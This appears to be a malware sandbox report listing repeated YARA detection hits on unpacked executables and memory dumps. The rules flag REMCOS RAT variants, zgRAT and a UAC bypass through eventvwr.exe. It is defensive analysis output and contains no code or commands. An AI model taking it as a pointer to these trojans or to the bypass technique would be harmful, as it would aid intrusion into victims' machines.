Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
